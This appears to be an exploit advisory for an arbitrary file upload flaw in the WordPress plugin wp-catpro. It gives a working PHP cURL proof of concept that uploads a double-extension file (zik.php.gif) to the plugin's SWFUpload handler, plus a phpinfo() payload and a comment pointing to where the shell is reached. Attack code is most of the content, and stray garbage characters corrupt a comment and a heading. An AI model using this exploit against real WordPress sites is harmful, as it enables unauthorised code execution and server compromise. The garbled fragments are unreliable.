WordPress plugin wp-catpro — Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
作者 => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif —— 从 PoC 可见，上传处理只按最后一个后缀（gif）做白名单检查，而文件名字符规则允许 '.'，因此双扩展名可以通过。注意：该文件只有在 Web 服务器按文件名中任意 .php 段交给 PHP 处理（例如 Apache 的 AddHandler 配置）时才会被当作 PHP 执行；否则文件虽然能落盘，但只会作为图片返回。
# ("jpg", "gif", "png") // Allowed file extensions
# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)/ K# L4 s& D6 v9 h- E9 `
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format) -- note that '.' is allowed, so multi-dot names such as shell.php.gif pass this filter
------------------
#=> Exploit
0 e" q8 _& f4 E: i1 r-----------
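<?php
// PoC: file upload through the SWFUpload handler bundled with wp-catpro.
// Target endpoint (fill in host and WordPress path):
//   /wp-content/plugins/wp-catpro/js/swfupload/js/upload.php
// Only run this against systems you are authorised to test.

// Local payload. The handler's extension whitelist is jpg/gif/png, so the
// double extension ".php.gif" is what gets the file past the check.
$uploadfile = "zik.php.gif";
$target = "http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php";

// The legacy "@file" POST-field form stopped uploading files once
// CURLOPT_SAFE_UPLOAD became the default (PHP 5.6+) and was removed in PHP 7;
// use CURLFile where it exists and fall back to "@file" on older interpreters.
$filePart = class_exists('CURLFile') ? new CURLFile($uploadfile) : "@$uploadfile";

$ch = curl_init($target);
curl_setopt($ch, CURLOPT_POST, true);
// array() rather than [] so the script still parses on the PHP 5.3-era
// interpreters this PoC was written against.
// NOTE(review): 'folder' is client-supplied; whether upload.php validates it
// server-side is not visible here -- confirm against the plugin source before
// assuming the destination is confined to the uploads directory.
curl_setopt($ch, CURLOPT_POSTFIELDS, array(
    'Filedata' => $filePart,
    'folder'   => '/wp-content/uploads/catpro/',
));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
if ($postResult === false) {
    // Report the transport error instead of silently printing an empty string.
    fwrite(STDERR, "curl error: " . curl_error($ch) . "\n");
    curl_close($ch);
    exit(1);
}
curl_close($ch);
// The handler stores the upload under a random name, so the response is the
// only place to learn the final file name.
print "$postResult";

// Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
// The ".php.gif" name is only executed as PHP where the web server maps PHP
// by any ".php" segment of the file name (e.g. Apache AddHandler); on servers
// that only honour the last extension the file lands on disk but is served
// as an image.
?>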
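<?php
// Body of the uploaded zik.php.gif: prints the PHP configuration so that
// server-side execution of the "image" can be confirmed in a browser.
phpinfo();
?>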